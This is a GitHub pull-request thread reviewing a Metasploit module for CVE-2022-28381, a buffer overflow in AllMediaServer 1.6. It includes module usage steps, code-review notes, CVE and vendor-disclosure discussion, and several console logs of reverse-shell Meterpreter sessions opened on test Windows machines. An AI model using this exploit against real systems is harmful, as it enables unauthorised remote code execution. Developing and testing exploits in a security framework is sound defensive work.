Add in CVE-2022-28381 - AllMediaServer 1.6 Buffer Overflow Exploit

[gwillcox-r7]

Initially submitted to Metasploit Dev emailing list via Hejap Zairy Al-Sharif aka @Matrix07ksa, uploading here since contributor was having issues setting up Git to submit the PR and asked if I could do it instead.

Exploit seems to exploit a vulnerability in the latest version of AllMediaServer via a TCP request to a port which is opened when AllMediaServer is started. By crafting the packet to contain a long string it is possible to cause a buffer overflow resulting in a SEH overwrite which can then be used to gain RCE as the user running AllMediaServer.

I am not aware of any CVE or patch for this vulnerability at this time, but still need to verify it manually and check that it does indeed work as described.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/windows/misc/allmedia_1_6_buffer_overflow
• set RHOST <target IP address>
• Optional set RPORT <target port if not the default of 888>
• exploit
• Verify that you get a shell on the target
• Document any issues encountered.

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[Matrix07ksa]

[image: image.png] It works great - Start msfconsole - use exploit/windows/misc/allmedia_1_6_buffer_overflow - set RHOST <target IP address> - Optional set RPORT <target port if not the default of 888> - (port) set LPORT - exploit ‫في الجمعة، 1 أبريل 2022 في 9:55 م تمت كتابة ما يلي بواسطة ‪Grant Willcox‬‏ ***@***.***‬‏>:‬

…

Initially submitted to Metasploit Dev emailing list via Hejap Zairy Al-Sharif aka @Matrix07ksa <https://github.com/Matrix07ksa>, uploading here since contributor was having issues setting up Git to submit the PR and asked if I could do it instead. Exploit seems to exploit a vulnerability in the latest version of AllMediaServer via a TCP request to a port which is opened when AllMediaServer is started. By crafting the packet to contain a long string it is possible to cause a buffer overflow resulting in a SEH overwrite which can then be used to gain RCE as the user running AllMediaServer. I am not aware of any CVE or patch for this vulnerability at this time, but still need to verify it manually and check that it does indeed work as described. Verification List the steps needed to make sure this thing works - Start msfconsole - use exploit/windows/misc/allmedia_1_6_buffer_overflow - set RHOST <target IP address> - Optional set RPORT <target port if not the default of 888> - exploit - *Verify* that you get a shell on the target - *Document* any issues encountered. ------------------------------ You can view, comment on, or merge this pull request online at: #16399 Commit Summary - 285645e <285645e> Add initial code from Hajap Zairy Al-Sharif File Changes (1 file <https://github.com/rapid7/metasploit-framework/pull/16399/files>) - *A* modules/exploits/windows/misc/allmedia_1_6_buffer_overflow.rb <https://github.com/rapid7/metasploit-framework/pull/16399/files#diff-4a20d71228d41b47a7893177cfd017fe6c53f693019949b3a8f3f8bd023345e8> (89) Patch Links: - https://github.com/rapid7/metasploit-framework/pull/16399.patch - https://github.com/rapid7/metasploit-framework/pull/16399.diff — Reply to this email directly, view it on GitHub <#16399>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AIAUBYSDDI4KXH2HGKDOCHLVC5BA7ANCNFSM5SJPVPQQ> . You are receiving this because you were mentioned.Message ID: ***@***.***>

[todb-r7]

Heya @Matrix07ksa, thanks for the module. Have you tried to report this to the vendor, which I'm pretty sure is https://www.allmediaserver.org/ ? If not, we can do that for you, and also get a CVE ID reserved. Just let me know if you've already been down this path so we don't collide in CVE reservations.

[Matrix07ksa]

I reported cve.mitre.org and did not report the seller, if you can report on my behalf and help me, thank you very much for the help في الجمعة، ١ أبريل ٢٠٢٢ ١٠:٤٨ م Tod Beardsley ***@***.***> كتب:

…

Heya Hejap, thanks for the module. Have you tried to report this to the vendor, which I'm pretty sure is https://www.allmediaserver.org/ ? If not, we can do that for you, and also get a CVE ID reserved. Just let me know if you've already been down this path so we don't collide in CVE reservations. — Reply to this email directly, view it on GitHub <#16399 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AIAUBYU2KK6UXMTUY2OHRZTVC5HG5ANCNFSM5SJPVPQQ> . You are receiving this because you were mentioned.Message ID: ***@***.***>

[its0x08]

When will this be merged ?

[Matrix07ksa]

When will this be merged ?

Explain your question more?

[gwillcox-r7]

When will this be merged ?

@its0x08 When it is ready :) We still need to do the following:

• Write up a documentation file for the exploit
• Fix up the exploit (there are a number of issues with it which will need addressing before it can be landed that I identified from reading the code)
• Test the exploit and confirm it still works as expected after the code changes.
• Verify if there are any edge cases the user needs to be aware about that should be documented etc. Likely won't be for this one but always something we have to check for to ensure exploit is appropriately documented.
• Try get a CVE assigned. We can release without one being assigned as this is not a blocker but it would be nice to have one for reference purposes before we publish this into our codebase.

This should all be possible to do relatively easily given this isn't a very complex exploit so I estimate it should only take a day or two 😄 That being said note that most PRs take a few days to work their way through the system and this PR was literally just put up today so give it a bit of time and we'll get this landed as soon as possible 👍

[gwillcox-r7]

@Matrix07ksa One question I do have to ask is that this seems very similar to CVE-2017-17932 and the code seems near identical to https://www.exploit-db.com/exploits/43407 down to even the tabbing as I noted from the PoC you sent to me at https://raw.githubusercontent.com/Matrix07ksa/ALLMediaServer-1.6---Buffer-Overflow-Metasploit-/main/ALLMediaServer%201.6%20-%20Buffer%20Overflow%20(Metasploit).rb.

Have you tried to identify if they just didn't patch CVE-2017-17932 correctly?

[Matrix07ksa]

@Matrix07ksa One question I do have to ask is that this seems very similar to CVE-2017-17932 and the code seems near identical to https://www.exploit-db.com/exploits/43407 down to even the tabbing as I noted from the PoC you sent to me at https://raw.githubusercontent.com/Matrix07ksa/ALLMediaServer-1.6---Buffer-Overflow-Metasploit-/main/ALLMediaServer%201.6%20-%20Buffer%20Overflow%20(Metasploit).rb.

Have you tried to identify if they just didn't patch CVE-2017-17932 correctly?

It is similar in a simple way, but I made the exploitation manually in Python and it was converted only to a module

https://github.com/Matrix07ksa/ALLMediaServer-1.6-Buffer-Overflow/blob/main/ALLMediaServer%201.6%20Remote%20-%20Buffer%20Overflow%20(SEH).py

Also note there is a difference in Address seh and nops

[Matrix07ksa]

@Matrix07ksa One question I do have to ask is that this seems very similar to CVE-2017-17932 and the code seems near identical to https://www.exploit-db.com/exploits/43407 down to even the tabbing as I noted from the PoC you sent to me at https://raw.githubusercontent.com/Matrix07ksa/ALLMediaServer-1.6---Buffer-Overflow-Metasploit-/main/ALLMediaServer%201.6%20-%20Buffer%20Overflow%20(Metasploit).rb.

Have you tried to identify if they just didn't patch CVE-2017-17932 correctly?

It is similar in a simple way, but I made the exploitation manually in Python and it was converted only to a module

https://github.com/Matrix07ksa/ALLMediaServer-1.6-Buffer-Overflow/blob/main/ALLMediaServer%201.6%20Remote%20-%20Buffer%20Overflow%20(SEH).py

Also note there is a difference in Address seh and nops

Looks like doesn't mean the same There are differences also in Buffer
Also it works on a very old version and I am on the latest update and I sent it to cve.mitre.org and currently waiting if you can make a cve for me thanks for your help

Yes patch CVE-2017-17932 and different address

[gwillcox-r7]

Suggested change

	# Author: Hejap Zairy
	# Date: 1.08.2022
	# Exploit Prof
	# Proof and Exploit:
	#image:https://i.imgur.com/yLrRR2t.png
	#video:https://streamable.com/x4i50c

All of this information normally goes into the description fields, and it seems you already filled these fields out with the appropriate information. We don't allow this type of information to go elsewhere so I'm going to have to remove this.

[gwillcox-r7]

This line used to be required in old versions of Metasploit but modern Metasploit versions no longer require it so we should remove this.

[gwillcox-r7]

Looks like this was taken from old code. Metasploit4 is ancient now as we are on Metasploit 6. This is how this should be defined:

Suggested change

	class Metasploit4 < Msf::Exploit::Remote
	class MetasploitModule < Msf::Exploit::Remote

[gwillcox-r7]

See https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking for more info on exploit rankings. As this is a buffer overflow, this can never have an ExcellentRanking ranking, as there is a chance it might fail. As this exploit does not presently do a version check the appropriate ranking would be GoodRanking. If one could do a remote version check I'd bump this up to GreatRanking though.

Suggested change

	Rank = ExcellentRanking
	Rank = GoodRanking

[gwillcox-r7]

Should really be using generate_seh_record from https://github.com/gwillcox-r7/metasploit-framework/blob/285645e04ca8d1f3552f6a80f7e235811942e8b6/lib/msf/core/exploit/seh.rb#L43 here, otherwise I'm not sure why you are using the line include Msf::Exploit::Seh if you are not using any functions from that library.

[gwillcox-r7]

Might need to update this to be 0 if we make this a single target since the array count will start from 0.

[gwillcox-r7]

Suggested change

	'ExitFunction' => 'process', #none/process/thread/seh
	'ExitFunction' => 'process',

[gwillcox-r7]

Suggested change

	},
	'Targets' =>
	},
	'Targets' =>

[gwillcox-r7]

Suggested change

	Thank you Saud Alenazi and 0xSaudi
	and Muhammad Al Ahmadi and all the friends in Tuwaiq i Love Tuwaiq

Whilst I appreciate you shouting out friends, this is not the place to do it. Feel free to do that in the PR description or as a comment on this PR, however the description here should only contain details about the bug itself and expected behavior of the module.

[gwillcox-r7]

I think there is a better way to do this option, but I'll have to get back to you on this.

[gwillcox-r7]

@Matrix07ksa left comments above for the purpose of anyone interested in learning what might need to be changed to get this landed. Going to go ahead and make the changes myself so long as I don't think you have access to my branch on GitHub to make the changes yourself, but thought it might be good to just learn for future contributions what sort of things we tend to look for and want changed. Let me know if any of the suggestions seem odd or if you need more info.

[Matrix07ksa]

Nice suggestions, I actually benefited from them. I wish I could fix it myself, but because you will fix it. Thank you very much, my brother, too, my brother. I forgot and made it metasploit 4 because I copied it on your site quickly in order to fix the exploit and run it. في السبت، ٢ أبريل ٢٠٢٢ ١:٤٦ ص Grant Willcox ***@***.***> كتب:

…

@Matrix07ksa <https://github.com/Matrix07ksa> left comments above for the purpose of anyone interested in learning what might need to be changed to get this landed. Going to go ahead and make the changes myself so long as I don't think you have access to my branch on GitHub to make the changes yourself, but thought it might be good to just learn for future contributions what sort of things we tend to look for and want changed. Let me know if any of the suggestions seem odd or if you need more info. — Reply to this email directly, view it on GitHub <#16399 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AIAUBYWOPQQOGQKW3EP7GTLVC54ELANCNFSM5SJPVPQQ> . You are receiving this because you were mentioned.Message ID: ***@***.***>

[gwillcox-r7]

Hmm not getting a shell with this:

msf6 exploit(windows/misc/allmediaserver_1_6_buffer_overflow) > show options

Module options (exploit/windows/misc/allmediaserver_1_6_buffer_overflow):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  172.26.228.73    yes       The target host(s), see https://github.com/rapid7/m
                                      etasploit-framework/wiki/Using-Metasploit
   RPORT   888              yes       The target port (TCP)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, proces
                                        s, none)
   LHOST     172.26.231.92    yes       The listen address (an interface may be specified
                                        )
   LPORT     9999             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   ALLMediaServer 1.6


msf6 exploit(windows/misc/allmediaserver_1_6_buffer_overflow) > exploit

[*] Started reverse TCP handler on 172.26.231.92:9999 
[*] 172.26.228.73:888 - Sending payload to exploit MediaServer...
[*] 172.26.228.73:888 - Sent payload...hopefully we should get a shell!
[*] Exploit completed, but no session was created.
msf6 exploit(windows/misc/allmediaserver_1_6_buffer_overflow) >

Will recheck this in a debugger and try figure out what is going wrong.

[gwillcox-r7]

@Matrix07ksa For reference did you only test this on x86 versions of the product? This is what I get when running the latest version of AllMedia Server 1.6 on Windows 11 for the address 0x0040590B:

[Matrix07ksa]

Make the Payload x86 في السبت، ٢ أبريل ٢٠٢٢ ٣:٠٢ ص Grant Willcox ***@***.***> كتب:

…

Hmm not getting a shell with this: msf6 exploit(windows/misc/allmediaserver_1_6_buffer_overflow) > show options Module options (exploit/windows/misc/allmediaserver_1_6_buffer_overflow): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 172.26.228.73 yes The target host(s), see https://github.com/rapid7/m etasploit-framework/wiki/Using-Metasploit RPORT 888 yes The target port (TCP) Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, proces s, none) LHOST 172.26.231.92 yes The listen address (an interface may be specified ) LPORT 9999 yes The listen port Exploit target: Id Name -- ---- 0 ALLMediaServer 1.6 msf6 exploit(windows/misc/allmediaserver_1_6_buffer_overflow) > Will recheck this in a debugger and try figure out what is going wrong. — Reply to this email directly, view it on GitHub <#16399 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AIAUBYQI4ARG6PJKIEVGPFDVC6FCBANCNFSM5SJPVPQQ> . You are receiving this because you were mentioned.Message ID: ***@***.***>

[Matrix07ksa]

Try it in Windows 7, then try it in Windows 10 في السبت، ٢ أبريل ٢٠٢٢ ٣:١١ ص حجاب زائري ***@***.***> كتب:

…

Make the Payload x86 في السبت، ٢ أبريل ٢٠٢٢ ٣:٠٢ ص Grant Willcox ***@***.***> كتب: > Hmm not getting a shell with this: > > msf6 exploit(windows/misc/allmediaserver_1_6_buffer_overflow) > show options > > Module options (exploit/windows/misc/allmediaserver_1_6_buffer_overflow): > > Name Current Setting Required Description > ---- --------------- -------- ----------- > RHOSTS 172.26.228.73 yes The target host(s), see https://github.com/rapid7/m > etasploit-framework/wiki/Using-Metasploit > RPORT 888 yes The target port (TCP) > > > Payload options (windows/x64/meterpreter/reverse_tcp): > > Name Current Setting Required Description > ---- --------------- -------- ----------- > EXITFUNC process yes Exit technique (Accepted: '', seh, thread, proces > s, none) > LHOST 172.26.231.92 yes The listen address (an interface may be specified > ) > LPORT 9999 yes The listen port > > > Exploit target: > > Id Name > -- ---- > 0 ALLMediaServer 1.6 > > > msf6 exploit(windows/misc/allmediaserver_1_6_buffer_overflow) > > > Will recheck this in a debugger and try figure out what is going wrong. > > — > Reply to this email directly, view it on GitHub > <#16399 (comment)>, > or unsubscribe > <https://github.com/notifications/unsubscribe-auth/AIAUBYQI4ARG6PJKIEVGPFDVC6FCBANCNFSM5SJPVPQQ> > . > You are receiving this because you were mentioned.Message ID: > ***@***.***> >

[Matrix07ksa]

The address is inside the program and it works fine في السبت، ٢ أبريل ٢٠٢٢ ٣:١٢ ص حجاب زائري ***@***.***> كتب:

…

Try it in Windows 7, then try it in Windows 10 في السبت، ٢ أبريل ٢٠٢٢ ٣:١١ ص حجاب زائري ***@***.***> كتب: > Make the Payload x86 > > في السبت، ٢ أبريل ٢٠٢٢ ٣:٠٢ ص Grant Willcox ***@***.***> > كتب: > >> Hmm not getting a shell with this: >> >> msf6 exploit(windows/misc/allmediaserver_1_6_buffer_overflow) > show options >> >> Module options (exploit/windows/misc/allmediaserver_1_6_buffer_overflow): >> >> Name Current Setting Required Description >> ---- --------------- -------- ----------- >> RHOSTS 172.26.228.73 yes The target host(s), see https://github.com/rapid7/m >> etasploit-framework/wiki/Using-Metasploit >> RPORT 888 yes The target port (TCP) >> >> >> Payload options (windows/x64/meterpreter/reverse_tcp): >> >> Name Current Setting Required Description >> ---- --------------- -------- ----------- >> EXITFUNC process yes Exit technique (Accepted: '', seh, thread, proces >> s, none) >> LHOST 172.26.231.92 yes The listen address (an interface may be specified >> ) >> LPORT 9999 yes The listen port >> >> >> Exploit target: >> >> Id Name >> -- ---- >> 0 ALLMediaServer 1.6 >> >> >> msf6 exploit(windows/misc/allmediaserver_1_6_buffer_overflow) > >> >> Will recheck this in a debugger and try figure out what is going wrong. >> >> — >> Reply to this email directly, view it on GitHub >> <#16399 (comment)>, >> or unsubscribe >> <https://github.com/notifications/unsubscribe-auth/AIAUBYQI4ARG6PJKIEVGPFDVC6FCBANCNFSM5SJPVPQQ> >> . >> You are receiving this because you were mentioned.Message ID: >> ***@***.***> >> >

[Matrix07ksa]

Breakpoint address shift F9 في السبت، ٢ أبريل ٢٠٢٢ ٣:١٣ ص حجاب زائري ***@***.***> كتب:

…

The address is inside the program and it works fine في السبت، ٢ أبريل ٢٠٢٢ ٣:١٢ ص حجاب زائري ***@***.***> كتب: > Try it in Windows 7, then try it in Windows 10 > > في السبت، ٢ أبريل ٢٠٢٢ ٣:١١ ص حجاب زائري ***@***.***> كتب: > >> Make the Payload x86 >> >> في السبت، ٢ أبريل ٢٠٢٢ ٣:٠٢ ص Grant Willcox ***@***.***> >> كتب: >> >>> Hmm not getting a shell with this: >>> >>> msf6 exploit(windows/misc/allmediaserver_1_6_buffer_overflow) > show options >>> >>> Module options (exploit/windows/misc/allmediaserver_1_6_buffer_overflow): >>> >>> Name Current Setting Required Description >>> ---- --------------- -------- ----------- >>> RHOSTS 172.26.228.73 yes The target host(s), see https://github.com/rapid7/m >>> etasploit-framework/wiki/Using-Metasploit >>> RPORT 888 yes The target port (TCP) >>> >>> >>> Payload options (windows/x64/meterpreter/reverse_tcp): >>> >>> Name Current Setting Required Description >>> ---- --------------- -------- ----------- >>> EXITFUNC process yes Exit technique (Accepted: '', seh, thread, proces >>> s, none) >>> LHOST 172.26.231.92 yes The listen address (an interface may be specified >>> ) >>> LPORT 9999 yes The listen port >>> >>> >>> Exploit target: >>> >>> Id Name >>> -- ---- >>> 0 ALLMediaServer 1.6 >>> >>> >>> msf6 exploit(windows/misc/allmediaserver_1_6_buffer_overflow) > >>> >>> Will recheck this in a debugger and try figure out what is going wrong. >>> >>> — >>> Reply to this email directly, view it on GitHub >>> <#16399 (comment)>, >>> or unsubscribe >>> <https://github.com/notifications/unsubscribe-auth/AIAUBYQI4ARG6PJKIEVGPFDVC6FCBANCNFSM5SJPVPQQ> >>> . >>> You are receiving this because you were mentioned.Message ID: >>> ***@***.***> >>> >>

[Matrix07ksa]

)

[Matrix07ksa]

Do you see the attached pictures?

[gwillcox-r7]

Do you see the attached pictures?

Nope I don't. Also the payload type doesn't matter. The problem is that SEH handling techniques changed with x64 architecture so the way this exploit is coded with overwriting the SEH handler to get code execution, one can only make the exploit on x86 systems. It will not work against systems running x64 versions of Windows due to the fact that the way SEH was implemented was changed on the x64 architecture and it doesn't work the same way as x86 versions of Windows.

This likely also means I'm going to need to update the ARCH field on this exploit to note that it only targets x86 versions of Windows. Unfortunately x86 versions of Windows are pretty uncommon these days in my experience and with Windows 11 Microsoft and other companies have moved to only supporting x64 architectures going forwards, so this may limit the use cases of this exploit somewhat.

You can find more details on this at https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/seh-based-buffer-overflow

I wonder if it would be possible to exploit this without overwriting SEH, which would solve this issue. If not then unfortunately this might only be exploitable on x86 systems :/

[gwillcox-r7]

Further poking around with this seems to indicate that an exception will be thrown before we could potentially overwrite EIP and otherwise redirect it via a standard buffer overflow so yeah this is likely only exploitable as a SEH buffer overflow bug. I'll see if I can't set up a x86 version of Windows for testing purposes but I'll likely have to update the ARCH section to note this is going to only support x86 targets.

[Matrix07ksa]

When the windows system installs the program on x86, you can exploit correctly in any version 7,8,10,11 في السبت، ٢ أبريل ٢٠٢٢ ٣:٤٩ ص Grant Willcox ***@***.***> كتب:

…

Further poking around with this seems to indicate that an exception will be thrown before we could potentially overwrite EIP and otherwise redirect it via a standard buffer overflow so yeah this is likely only exploitable as a SEH buffer overflow bug. I'll see if I can't set up a x86 version of Windows for testing purposes but I'll likely have to update the ARCH section to note this is going to only support x86 targets. — Reply to this email directly, view it on GitHub <#16399 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AIAUBYX6Q6APCOYVZQEEX63VC6KPZANCNFSM5SJPVPQQ> . You are receiving this because you were mentioned.Message ID: ***@***.***>

[bcoles]

Windows 8.1 (32-bit)

msf6 exploit(windows/misc/allmediaserver_1_6_buffer_overflow) > run

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] 192.168.200.145:888 - Sending payload to exploit MediaServer...
[*] 192.168.200.145:888 - Sent payload...hopefully we should get a shell!
[*] Sending stage (175174 bytes) to 192.168.200.145
[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.145:49433 ) at 2022-04-01 21:06:38 -0400

meterpreter > sysinfo
Computer        : IE11WIN8_1
OS              : Windows 8.1 (6.3 Build 9600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

Windows 7 Ultimate SP1 (32-bit)

msf6 exploit(windows/misc/allmediaserver_1_6_buffer_overflow) > run

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] 192.168.200.144:888 - Sending payload to exploit MediaServer...
[*] 192.168.200.144:888 - Sent payload...hopefully we should get a shell!
[*] Sending stage (175174 bytes) to 192.168.200.144
[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.144:49169 ) at 2022-04-01 20:48:06 -0400

meterpreter > sysinfo
Computer        : WIN-7-ULTIMATE-
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

Windows 7 Professional SP1 (64-bit)

[Matrix07ksa]

Set up and install the software options on the X86 inside the X64 will be exploited and the SEH address is effectively في السبت، ٢ أبريل ٢٠٢٢ ٣:٥٤ ص حجاب زائري ***@***.***> كتب:

…

When the windows system installs the program on x86, you can exploit correctly in any version 7,8,10,11 في السبت، ٢ أبريل ٢٠٢٢ ٣:٤٩ ص Grant Willcox ***@***.***> كتب: > Further poking around with this seems to indicate that an exception will > be thrown before we could potentially overwrite EIP and otherwise redirect > it via a standard buffer overflow so yeah this is likely only exploitable > as a SEH buffer overflow bug. I'll see if I can't set up a x86 version of > Windows for testing purposes but I'll likely have to update the ARCH > section to note this is going to only support x86 targets. > > — > Reply to this email directly, view it on GitHub > <#16399 (comment)>, > or unsubscribe > <https://github.com/notifications/unsubscribe-auth/AIAUBYX6Q6APCOYVZQEEX63VC6KPZANCNFSM5SJPVPQQ> > . > You are receiving this because you were mentioned.Message ID: > ***@***.***> >

[Matrix07ksa]

Yes, as I told you earlier that when you install it and run it on x68 inside x64 it will hack and find the seh address effectively في السبت، ٢ أبريل ٢٠٢٢ ٣:٥٦ ص حجاب زائري ***@***.***> كتب:

…

Set up and install the software options on the X86 inside the X64 will be exploited and the SEH address is effectively في السبت، ٢ أبريل ٢٠٢٢ ٣:٥٤ ص حجاب زائري ***@***.***> كتب: > When the windows system installs the program on x86, you can exploit > correctly in any version 7,8,10,11 > > في السبت، ٢ أبريل ٢٠٢٢ ٣:٤٩ ص Grant Willcox ***@***.***> > كتب: > >> Further poking around with this seems to indicate that an exception will >> be thrown before we could potentially overwrite EIP and otherwise redirect >> it via a standard buffer overflow so yeah this is likely only exploitable >> as a SEH buffer overflow bug. I'll see if I can't set up a x86 version of >> Windows for testing purposes but I'll likely have to update the ARCH >> section to note this is going to only support x86 targets. >> >> — >> Reply to this email directly, view it on GitHub >> <#16399 (comment)>, >> or unsubscribe >> <https://github.com/notifications/unsubscribe-auth/AIAUBYX6Q6APCOYVZQEEX63VC6KPZANCNFSM5SJPVPQQ> >> . >> You are receiving this because you were mentioned.Message ID: >> ***@***.***> >> >

[Matrix07ksa]

I will experience more proof on Windows 11 from X64 system within the infected program X86 في السبت، ٢ أبريل ٢٠٢٢ ٤:٠٠ ص حجاب زائري ***@***.***> كتب:

…

Yes, as I told you earlier that when you install it and run it on x68 inside x64 it will hack and find the seh address effectively في السبت، ٢ أبريل ٢٠٢٢ ٣:٥٦ ص حجاب زائري ***@***.***> كتب: > Set up and install the software options on the X86 inside the X64 will be > exploited and the SEH address is effectively > > في السبت، ٢ أبريل ٢٠٢٢ ٣:٥٤ ص حجاب زائري ***@***.***> كتب: > >> When the windows system installs the program on x86, you can exploit >> correctly in any version 7,8,10,11 >> >> في السبت، ٢ أبريل ٢٠٢٢ ٣:٤٩ ص Grant Willcox ***@***.***> >> كتب: >> >>> Further poking around with this seems to indicate that an exception >>> will be thrown before we could potentially overwrite EIP and otherwise >>> redirect it via a standard buffer overflow so yeah this is likely only >>> exploitable as a SEH buffer overflow bug. I'll see if I can't set up a x86 >>> version of Windows for testing purposes but I'll likely have to update the >>> ARCH section to note this is going to only support x86 targets. >>> >>> — >>> Reply to this email directly, view it on GitHub >>> <#16399 (comment)>, >>> or unsubscribe >>> <https://github.com/notifications/unsubscribe-auth/AIAUBYX6Q6APCOYVZQEEX63VC6KPZANCNFSM5SJPVPQQ> >>> . >>> You are receiving this because you were mentioned.Message ID: >>> ***@***.***> >>> >>

[Matrix07ksa]

msf6 exploit(windows/misc/allmediaserver_bof) > exploit

[*] 192.168.56.1:888 - Sending payload ... 
 Exploit MediaServer
[*] Started bind TCP handler against 192.168.56.1:4444
[*] Sending stage (175174 bytes) to 192.168.56.1
[*] Meterpreter session 6 opened (10.0.3.15:46343 -> 192.168.56.1:4444) at 2022-04-01 21:11:26 -0400

meterpreter > sysinfo 
Computer        : DESKTOP-FGR6JP9
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : ar_SA
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

[Matrix07ksa]

Watch this video I documented in exploiting the program in Windows 11

Windows 11(10.0) Build 22000 (64-bit)
Running 32-bit

https://streamable.com/2ku5il

CVE-2022-28381

[gwillcox-r7]

Changed title to reflect updated status of being assigned a CVE. Will make sure to get the code updated now.

[Matrix07ksa]

Changed title to reflect updated status of being assigned a CVE. Will make sure to get the code updated now.

Nice ❤👍🏻🌹

[gwillcox-r7]

Works like a charm on x86 install of Windows 10, no issues there and target seems to still interact normally without any issues 👍

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/misc/cve_2022_28381_allmediaserver_bof 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/cve_2022_28381_allmediaserver_bof) > show options

Module options (exploit/windows/misc/cve_2022_28381_allmediaserver_bof):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasplo
                                      it
   RPORT   888              yes       The target port (TCP)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.26.241.162   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   ALLMediaServer 1.6


msf6 exploit(windows/misc/cve_2022_28381_allmediaserver_bof) > set RHOSTS 172.26.251.245
RHOSTS => 172.26.251.245
msf6 exploit(windows/misc/cve_2022_28381_allmediaserver_bof) > set LHOST 172.26.241.162 
LHOST => 172.26.241.162
msf6 exploit(windows/misc/cve_2022_28381_allmediaserver_bof) > exploit

[*] Started reverse TCP handler on 172.26.241.162:4444 
[*] 172.26.251.245:888 - Sending payload to exploit MediaServer...
[*] 172.26.251.245:888 - Sent payload...hopefully we should get a shell!
[*] Sending stage (175174 bytes) to 172.26.251.245
[*] Meterpreter session 1 opened (172.26.241.162:4444 -> 172.26.251.245:50285 ) at 2022-04-04 10:50:22 -0500

meterpreter > getuid
Server username: DESKTOP-JLPENJ2\admin
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
meterpreter > sysinfo
Computer        : DESKTOP-JLPENJ2
OS              : Windows 10 (10.0 Build 19043).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x86/windows
meterpreter > 

[Matrix07ksa]

Works like a charm on x86 install of Windows 10, no issues there and target seems to still interact normally without any issues 👍

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/misc/cve_2022_28381_allmediaserver_bof 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/cve_2022_28381_allmediaserver_bof) > show options

Module options (exploit/windows/misc/cve_2022_28381_allmediaserver_bof):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasplo
                                      it
   RPORT   888              yes       The target port (TCP)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.26.241.162   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   ALLMediaServer 1.6


msf6 exploit(windows/misc/cve_2022_28381_allmediaserver_bof) > set RHOSTS 172.26.251.245
RHOSTS => 172.26.251.245
msf6 exploit(windows/misc/cve_2022_28381_allmediaserver_bof) > set LHOST 172.26.241.162 
LHOST => 172.26.241.162
msf6 exploit(windows/misc/cve_2022_28381_allmediaserver_bof) > exploit

[*] Started reverse TCP handler on 172.26.241.162:4444 
[*] 172.26.251.245:888 - Sending payload to exploit MediaServer...
[*] 172.26.251.245:888 - Sent payload...hopefully we should get a shell!
[*] Sending stage (175174 bytes) to 172.26.251.245
[*] Meterpreter session 1 opened (172.26.241.162:4444 -> 172.26.251.245:50285 ) at 2022-04-04 10:50:22 -0500

meterpreter > getuid
Server username: DESKTOP-JLPENJ2\admin
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
meterpreter > sysinfo
Computer        : DESKTOP-JLPENJ2
